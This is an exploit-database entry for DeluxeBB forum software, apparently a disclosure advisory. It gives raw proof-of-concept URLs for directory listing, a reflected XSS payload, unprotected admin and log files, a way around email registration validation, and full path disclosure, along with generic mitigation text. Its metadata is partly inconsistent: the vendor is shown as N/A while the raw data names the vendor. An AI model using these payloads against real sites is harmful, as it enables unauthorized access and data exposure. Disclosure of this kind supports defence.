Directory Listing, Cross Site Scripting, Unprotected Admin Panel Files, Unprotected Log Files, Mail Registration Validation Bypass, Full Path Disclosure

vendor:

N/A

by:

cp77fk4r

8.8

CVSS

HIGH

Directory Listing, Cross Site Scripting, Unprotected Admin Panel Files, Unprotected Log Files, Mail Registration Validation Bypass, Full Path Disclosure

79, 79, 532, 532, 200, 200

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Directory Listing, Cross Site Scripting, Unprotected Admin Panel Files, Unprotected Log Files, Mail Registration Validation Bypass, Full Path Disclosure

Directory Listing: The server is vulnerable to directory listing, which allows an attacker to view the contents of a directory without authentication. Cross Site Scripting: The server is vulnerable to Cross Site Scripting (XSS) attacks, which allows an attacker to inject malicious code into a web page. Unprotected Admin Panel Files: The server is vulnerable to unauthorized access to the admin panel files, which allows an attacker to gain access to sensitive information. Unprotected Log Files: The server is vulnerable to unauthorized access to log files, which allows an attacker to view sensitive information. Mail Registration Validation Bypass: The server is vulnerable to mail registration validation bypass, which allows an attacker to bypass the registration validation process. Full Path Disclosure: The server is vulnerable to full path disclosure, which allows an attacker to view the full path of a file.

Mitigation:

To mitigate the risk of directory listing, the server should be configured to disable directory listing. To mitigate the risk of XSS attacks, the server should be configured to validate user input and sanitize output. To mitigate the risk of unauthorized access to admin panel files, the server should be configured to restrict access to the admin panel files. To mitigate the risk of unauthorized access to log files, the server should be configured to restrict access to the log files. To mitigate the risk of mail registration validation bypass, the server should be configured to validate user input and require authentication for registration. To mitigate the risk of full path disclosure, the server should be configured to disable error messages.

Source

Exploit-DB raw data:

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<http://gmail.com>
# Vendor: http://www.deluxebb.com
#
#[Directory Listing]
http://server/templates/
http://server/images/
http://server/logs/
http://server/wysiwyg/
http://server/docs/
http://server/classes
http://server/lang
http://server/settings/
#
#
#[Cross Site Scripting]
http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
http://server/templates/deluxe/admincp/
http://server/templates/corporate/admincp/
http://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
http://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, Simply enter to the link:
http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
you can get your [USER_ID] on the last page of Member-List section:
http://server/misc.php?sub=memberlist&page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
http://server/misc.php?sub=memberlist&page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]

or:
http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]